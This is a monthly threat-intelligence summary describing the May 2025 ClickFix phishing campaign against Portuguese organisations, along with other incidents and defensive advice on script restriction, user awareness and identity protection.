ClickFix: The Defining Malware Wave of May 

The standout threat in May was a large-scale ClickFix campaign. This activity was mostly observed targeting public and private organisations in Portugal, particularly within the government, finance, and transportation sectors. 

These attacks represent a shift away from complex software exploitation toward direct user manipulation: 

• The Lure: The campaign’s infection chain begins with phishing emails containing a malicious ZIP attachment. An HTML file within the ZIP redirected victims to a malicious website, mimicking the legitimate Portuguese tax authority. 

• The Mechanism: Upon visiting the spoofed site, victims were presented with a fake document or software installation page. They were prompted to copy a PowerShell command and execute it manually in the Windows “Run” dialog. 

• Variations: While the Portuguese campaign focused on tax documents, other global ClickFix cases used different social engineering tactics. In some instances, users were tricked into running commands to “fix” a broken software (such as a fake Chrome or Microsoft Word error) or to solve a fake CAPTCHA challenge. 

• The Payload: In the Portuguese campaign, the primary payload was Lampion, a banking trojan/infostealer. However, globally, the technique has also been used to deploy Lumma Stealer, remote access trojans (Xworm and AsyncRAT), and other modular loaders. 

The ClickFix wave demonstrated that attackers bypass traditional perimeter security by leveraging a user’s willingness to troubleshoot their own systems, effectively using “living off the land” legitimate administrative tools (like PowerShell) to execute obfuscated code. 

What Else Happened in May 2025? 

1. Endless Abuse of Scripting and Living-off-the-Land Tools –Beyond ClickFix, attackers continued to leverage legitimate scripting frameworks to evade detection. Reports highlighted AutoIt-compiled droppers (such asDarkCloud Stealer) being used in phishing campaigns targeting government and technology sectors in the Netherlands and Hungary. These tools allow threat actors to create lightweight, evasive malware delivery chains that blend in with normal administrative traffic. 
2. Ransomware and Data Leaks –While ransomware groups remained active, data theft and extortion took center stage over pure encryption attacks. Significant breaches in May included a massive data exposure affecting 26.5 million users of South Korean operator SK Telecom, as well as a breach at data broker LexisNexis. These incidents emphasize that credential theft and long-term access remain higher priorities for attackers than immediate disruption.
3. Geopolitical Conflict and Influence Operations– The cyber domain heavily reflected real-world geopolitical tensions in May:

• DDoS Attacks: Pro-Russia groups, such as NoName057 (16), launched disruptive DDoS attacks against public and private services in the Netherlands (in retaliation for military aid to Ukraine) and Romania (targeting government portals during elections). 

• Disinformation: operations targeting the May 18th parliamentary elections in Portugal, with bot networks amplifying specific political narratives. 

• Espionage: Seven EU Member States formally called out activity by the Russian GRU (APT28). 

Key Takeaways 

• Social engineering is becoming as effective as exploitation – ClickFix proves that convincing users to manually run commands is a viable alternative to zero-day exploits. 

• Identity is the new perimeter – With the rise of infostealers like Lampion and Lumma, protecting credentials is crucial. 

• Geopolitics dictates target selection – DDoS attacks and disinformation are now standard during election periods and major EU policy decisions. 

Looking Ahead 

Organizations should focus on: 

• Restricting Script Execution – Monitoring and blocking unnecessary PowerShell execution (especially commands initiated from the Run dialog) is required. 

• User Awareness – Training must cover Clickfix lures. Users should be taught that legitimate support pages will never ask them to copy-paste code into a terminal. 

• Identity Protection – Implementing MFA and robust credential-theft detection. 

May 2025 showed that modern malware waves don’t always arrive through complex exploits; sometimes, they arrive one convincing “Clickfix” at a time. 

References 

• UNIT42: Lampion Is Back With ClickFix Lures 

• CERT-EU: Cyber Brief 25-06 (May 2025) 

This entry is published as part of the SOCshare project (No. 101145843), which we are running together with Vilnius City Municipality. It is partly funded by the European Union. The views and opinions expressed are those of the authors alone and do not necessarily reflect those of the European Union or the European Cyber Security Centre of Excellence. Neither the European Union nor the European Cyber Security Centre of Excellence can be held responsible for them.